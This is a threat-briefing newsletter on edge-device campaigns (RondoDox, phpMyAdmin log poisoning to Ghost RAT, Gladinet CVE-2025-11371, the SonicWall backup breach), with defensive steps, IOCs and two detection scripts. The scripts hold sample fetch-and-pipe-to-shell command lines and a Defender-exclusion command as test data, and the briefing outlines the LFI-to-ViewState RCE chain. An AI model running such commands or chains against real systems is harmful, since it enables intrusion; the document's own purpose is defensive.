Special Edition - Edge security roundup: RondoDox, Gladinet 0-day, SonicWall
Threat briefing on edge campaigns: RondoDox, phpMyAdmin poisoning, Gladinet 0-day, SonicWall backups breach, with quick defensive actions.
It’s one of those Fridays. Multiple active campaigns at the edge, a fresh 0‑day with real‑world abuse, and a breach that turns firewall backups into attacker candy. Keep it brief, keep it moving: block WAN admin, patch or workaround Gladinet, sweep for web shells, and rotate anything SonicWall ever touched.
Botnets With Bad Manners: RondoDox’s “Exploit Shotgun”
UncleSp1d3r: RondoDox is running the snuggest little crime-as-a-service you didn’t ask for — mass-scanning internet‑facing routers, DVRs/NVRs, CCTV boxes, and embedded web servers, then firing an “exploit shotgun” of 50+ n‑day bugs until something sticks. Post‑exploit it pivots through command injection to shell, drops multi‑architecture loaders, and pulls down DDoS/miner modules or RondoDox/Mirai/Morte flavors. Infra rotates constantly. Think CVE greatest hits like CVE-2023-1389 (TP‑Link), CVE-2024-3721, CVE-2024-12856, plus ~18 no‑CVE specials for good measure. Confirmed in telemetry and some CVEs now sit in CISA KEV. Sources: Trend Micro, SecurityWeek, BleepingComputer, The Register.
What to do now (today, ideally):
- Kill public admin: block WAN HTTP/HTTPS/Telnet/SSH to device management. Gate via VPN or jump hosts; allow‑list admin IPs.
- Patch firmware across router/DVR/CCTV fleets; prioritize KEV‑listed bugs and anything Trend calls out.
- Virtual patching: WAF/IPS for LFI/traversal/command injection patterns and known CGI endpoints.
- Hunt for loader traces and shell abuse: “#!/bin/sh”, “chmod 777”, “service apparmor stop”, “curl|sh”, “rondo.” strings; look for Proton/Tutanota email markers mentioned by Trend. Egress‑watch for odd HTTP/UDP floods.
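One way to turn the strings in that last bullet into a per-host hunt over collected command lines, as an added example that is not from Trend Micro or this briefing; the `<host> <command line>` record format, device names and the 198.51.100.7 address are constructed for the demo, and `curl|sh` is matched as a pattern so spacing and wget variants are caught too.

```python
import re
from collections import defaultdict

# Loader/shell-abuse strings named in the briefing; the pipe-to-shell trick is a
# regex so "curl ... | sh", "wget ... | bash" and spacing variants all register.
LITERAL_INDICATORS = ("#!/bin/sh", "chmod 777", "service apparmor stop", "rondo.")
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|;]*\|\s*(?:ba)?sh\b")

def indicators_in(cmdline):
    """Indicator labels present in one command line."""
    hits = [s for s in LITERAL_INDICATORS if s in cmdline]
    if PIPE_TO_SHELL.search(cmdline):
        hits.append("curl|sh")
    return hits

def hunt(lines):
    """Map host -> sorted distinct indicators. Each line is '<host> <command line>'."""
    per_host = defaultdict(set)
    for line in lines:
        host, _, cmd = line.partition(" ")
        per_host[host].update(indicators_in(cmd))
    return {h: sorted(v) for h, v in per_host.items() if v}

def suspicious_hosts(report, min_hits=2):
    """A lone '#!/bin/sh' is normal on any box; two or more distinct indicators is worth a look."""
    return sorted(h for h, v in report.items() if len(v) >= min_hits)

# Constructed command-line records for three edge devices (198.51.100.7 is a documentation address).
SAMPLE = [
    "cam-01 /bin/sh -c 'cd /tmp; curl -s http://198.51.100.7/x.sh | sh'",
    "cam-01 chmod 777 /tmp/rondo.x86",
    "nvr-02 service apparmor stop",
    "nvr-02 wget -qO- http://198.51.100.7/b | bash",
    "gw-03 sh -c 'echo \"#!/bin/sh\" > /tmp/t.sh'",
    "gw-03 ls -la /var/log",
]

if __name__ == "__main__":
    for host, inds in hunt(SAMPLE).items():
        print(host, inds)
    print("review:", suspicious_hosts(hunt(SAMPLE)))
```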
phpMyAdmin Log‑Poisoning → Nezha → Ghost RAT
KryptoKat: Huntress caught live intrusions abusing exposed phpMyAdmin panels — using MariaDB’s general_log to “poison” a PHP file that becomes a web shell, then driving AntSword like it’s a weekend rental. From there, operators fetch a Nezha agent (legit monitoring tool repurposed as RMM) to stage a Ghost RAT variant, disable Defender exclusions via PowerShell, and settle in. Over 100 victims observed, clustered in East Asia but not exclusively. Details and IOCs: Huntress, coverage via Infosecurity Magazine.
High‑value IOCs to block/hunt:
- Domains: rism.pages.dev, c.mid.al, gd.bj2.xyz
- IPs: 54.46.50.255, 45.207.220.12, 172.245.52.169, 38.246.250.201
- Hash samples (spot‑check fleet): f3570bb6e0f9c695d48f89f043380b43831dd0f6fe79b16eda2a3ffd9fd7ad16, 9f33095a24471bed55ce11803e4ebbed5118bfb5d3861baf1c8214efcd9e7de6
Mitigation fast track:
- Remove phpMyAdmin from the internet. Full stop. Put it behind VPN/allow‑lists with strong auth.
- Hunt for web shell POSTs and AntSword virtual terminal signatures; alert on httpd/IIS child processes launching curl/powershell.exe.
- Detect Nezha/Ghost egress and persistence: services named “SQLlite”, files in C:\Windows\Cursors\, mutex “gd.bj2[.]xyz:53762:SQLlite”; look for Add‑MpPreference abuse.
- Disable general_log (or force safe log locations) in MariaDB; nuke test installs in prod.
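The two detection bullets above (web-server processes launching curl/powershell.exe, plus the SQLlite service, Cursors directory, mutex and Add-MpPreference markers) as one added example; this is not Huntress's code, and the Sysmon-like event shape, host names and the 203.0.113.5 address are constructed.

```python
# Parent images that should not be launching downloaders or PowerShell, and the
# children the briefing calls out (assumed set; curl.exe added for Windows hosts).
WEB_TIER_PARENTS = {"httpd", "apache2", "php-fpm", "w3wp.exe"}
DROPPER_CHILDREN = {"curl", "curl.exe", "powershell.exe"}
# Persistence IoCs from the Huntress write-up, lowercased; the mutex domain is refanged.
IOC_SERVICE = "sqllite"
IOC_DIR = "c:\\windows\\cursors\\"
IOC_MUTEX = "gd.bj2.xyz:53762:sqllite"

def _base(path):
    """Image basename, tolerant of Windows and POSIX separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def check_event(ev):
    """Findings for one event; an empty list means nothing matched."""
    out = []
    if ev["type"] == "process":
        parent, child = _base(ev["parent_image"]), _base(ev["image"])
        if parent in WEB_TIER_PARENTS and child in DROPPER_CHILDREN:
            out.append(f"{parent} spawned {child}")
        if "add-mppreference" in ev["command_line"].lower():
            out.append("Add-MpPreference in command line")
    elif ev["type"] == "service":
        if ev["name"].lower() == IOC_SERVICE:
            out.append("service named SQLlite")
        if ev["path"].lower().startswith(IOC_DIR):
            out.append("binary under C:\\Windows\\Cursors\\")
    elif ev["type"] == "mutex" and ev["name"].lower() == IOC_MUTEX:
        out.append("Ghost RAT mutex")
    return out

def triage(events):
    """Flatten to (host, finding) pairs for per-host counting."""
    return [(ev["host"], f) for ev in events for f in check_event(ev)]

# Constructed events in a Sysmon-like shape; hosts and 203.0.113.5 are made up.
SAMPLE_EVENTS = [
    {"type": "process", "host": "web-01",
     "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -nop -c Add-MpPreference -ExclusionPath C:\Windows\Cursors"},
    {"type": "process", "host": "web-02", "parent_image": "/usr/sbin/apache2",
     "image": "/usr/bin/curl", "command_line": "curl -o /tmp/agent http://203.0.113.5/a"},
    {"type": "process", "host": "db-01", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe Get-Process"},
    {"type": "service", "host": "web-01", "name": "SQLlite", "path": r"C:\Windows\Cursors\svc.exe"},
    {"type": "mutex", "host": "web-01", "name": "gd.bj2.xyz:53762:SQLlite"},
]

if __name__ == "__main__":
    for host, finding in triage(SAMPLE_EVENTS):
        print(host, "->", finding)
```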
Actively Exploited 0‑Day: Gladinet CentreStack & Triofox (CVE-2025-11371)
KryptoKat: An unauthenticated LFI in CentreStack/Triofox lets attackers read Web.config, lift the machine keys, and then abuse ViewState deserialization to achieve RCE on the web tier. Huntress says it’s in the wild, and NVD agrees. There’s no vendor patch yet; use the published workaround and lock these portals down immediately. Sources: Huntress, NVD.
Do this now:
- Pull internet exposure for CentreStack/Triofox admin endpoints. Require VPN or allow‑listed IPs.
- Implement Huntress’s workaround: disable the “temp” handler in UploadDownloadProxy/Web.config (C:\Program Files (x86)\Gladinet Cloud Enterprise\UploadDownloadProxy\Web.config). Expect some functionality loss.
- Rotate machine/application keys and any creds in Web.config — treat exposed material as compromised.
- Hunt for ViewState exploit artifacts, web shells, odd base64 blobs, and new services spawned by the app pool. Stand up WAF/IPS rules for LFI patterns.
Major Breach: SonicWall Cloud Backups Accessed
KryptoKat: SonicWall confirmed an intruder accessed firewall configuration backup files stored in the MySonicWall cloud backup service. The files are encrypted, but possession still raises the stakes — reused creds, recoverable keys, and a roadmap to your management plane. If you used cloud backups, assume those configs are compromised and act accordingly. Sources: SonicWall’s notice (customer advisory), plus coverage via CISA, Dark Reading, and BleepingComputer.
Immediate priorities:
- Rotate everything those backups carried: appliance admin passwords, VPN pre‑shared keys, RADIUS/LDAP binds, API tokens, certificates/keys.
- Lock down management: allow‑listed admin IPs, MFA everywhere, review and restrict MySonicWall API access.
- Audit for fallout: unusual management logins, config changes, and policy pushes after the breach window. Consider disabling cloud backups until you can validate controls.
Ongoing: Oracle E‑Business Suite (CVE-2025-61882) — New Extortion Claims, Low Confidence
UncleSp1d3r: Midweek we covered Oracle’s EBS zero‑day and the scramble to patch. Since then, an AlienVault OTX pulse is claiming CL0P‑linked activity chaining UiServlet/SyncServlet exploitation into a Java implant train (GOLDVEIN downloader → SAGE implant) and executive‑targeted extortion emails. This is uncorroborated by other authoritative sources in our sweep; treat it as a heads‑up, not gospel. If you run EBS, keep it patched and internal, and hunt for weird servlets/classloader persistence and suspicious outbound C2. Source: OTX pulse (feed).
What to add to your hunt:
- Unusual requests to UiServlet/SyncServlet; new JSPs/servlets in webapp dirs.
- Spawned Java processes from EBS web tier; odd classloader artifacts.
- Outbound web beacons; block any C2s you can validate.
- Watch exec inboxes for extortion lures; turn on advanced phishing protections and MFA.
Heads‑Up: ZDI‑CAN‑28255 (All Hands) — Coordinated Disclosure Brews
KryptoKat: ZDI posted an upcoming advisory for All Hands (CVSS 7.8) with a long lead time — vendor has until 2026‑02‑06 to ship a fix. No public details yet, no exploitation confirmed, but if you run it on the internet, now’s a fine time for allow‑lists, VPN‑only admin, and beefy logging around management actions. Keep an eye on the board: ZDI Upcoming Advisories.
Closing thoughts: If you only triage three things before the weekend: block WAN admin on edge devices, implement the Gladinet workaround + access controls, and rotate SonicWall‑related credentials. As Captain Sisko might say, there’s a difference between vigilance and paranoia — but this week, a little paranoia comes with patch notes. Stay sharp out there.
— Kat & Sp1d3r